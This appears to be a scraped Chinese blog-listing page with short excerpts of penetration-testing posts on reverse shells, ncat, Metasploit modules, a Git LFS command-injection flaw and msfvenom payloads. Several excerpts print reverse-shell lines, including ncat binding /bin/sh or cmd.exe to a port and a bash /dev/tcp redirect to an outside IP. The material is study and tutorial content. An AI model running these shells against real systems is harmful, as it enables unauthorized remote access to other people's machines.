ncat -l -n -v -p 9999 ncat -e /bin/sh 127.0.0.1 9999 ncat -e C:\Windows\system32\cmd.exe 127.0.0.1 9999 ...
分类:
系统相关 时间:
2018-03-16 17:25:03
阅读次数:
212
开始准备OSCP认证,每天至少学习一个工具。今天学习网络神器ncat,它曾担任端口转发、反弹sehll等众多任务。
分类:
其他好文 时间:
2018-03-01 21:52:43
阅读次数:
244
转自:http://pirogue.org/2017/07/25/reverse-shell/ 一、跟踪系统调用 1. strace bash test.sh 2. strace -c bash test.sh 二、audit监控分析 1. audit相关资料 A Brief Introductio ...
分类:
系统相关 时间:
2018-01-13 22:18:22
阅读次数:
340
kali系统准备: 复制以下ruby代码到/usr/share/metasploit-framework/modules/exploits/windows/smb/msh_shell.rb目录(要注意代码缩进哦): 在命令行启动msf的服务: 再启动msf: 重新加载所有模块: 查找我们刚刚新建的m ...
分类:
系统相关 时间:
2017-12-12 16:02:56
阅读次数:
321
鉴于上篇文章http://z2ppp.blog.51cto.com/11186185/1975985mysqlmof提权metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网useexploit/windows/mysql/mysql_mof
setpass..
分类:
数据库 时间:
2017-10-25 23:38:29
阅读次数:
209
1、bash反弹 2、perl 3、php 4、ruby ...
分类:
系统相关 时间:
2017-10-09 14:06:50
阅读次数:
211
bash是一个命令解释语言,能够执行读取标准输入或文件的命令,可以执行命令以及结合nc进行反弹shell!基本使用语法bash-c命令root@kali:~#bash-cwhoami
root
root@kali:~#另外使用-i表示以交互方式运行shell,通常在目标主机上运行bash-i>&/dev/tcp/192.168.5.1/22220&g..
分类:
系统相关 时间:
2017-08-29 09:27:08
阅读次数:
160
Git命令造成的反弹shell 漏洞描述: Git LFS可以.lfsconfig使用LFS由存储库中的文件配置(部分),并且可以将Git LFS指向ssh://。 当使用这样的.lfsconfig文件克隆存储库时,使用LFS插件的Git将尝试调用ssh以从主机获取LFS对象 -oProxyComm ...
分类:
其他好文 时间:
2017-08-12 22:48:22
阅读次数:
255
一、使用msfvenom生成PS1文件: 二、开启msf监听: 二、在目标机器执行cmd命令: 注意区分目标及系统是32位还是64位。 ...
分类:
Web程序 时间:
2017-07-04 20:09:44
阅读次数:
2939
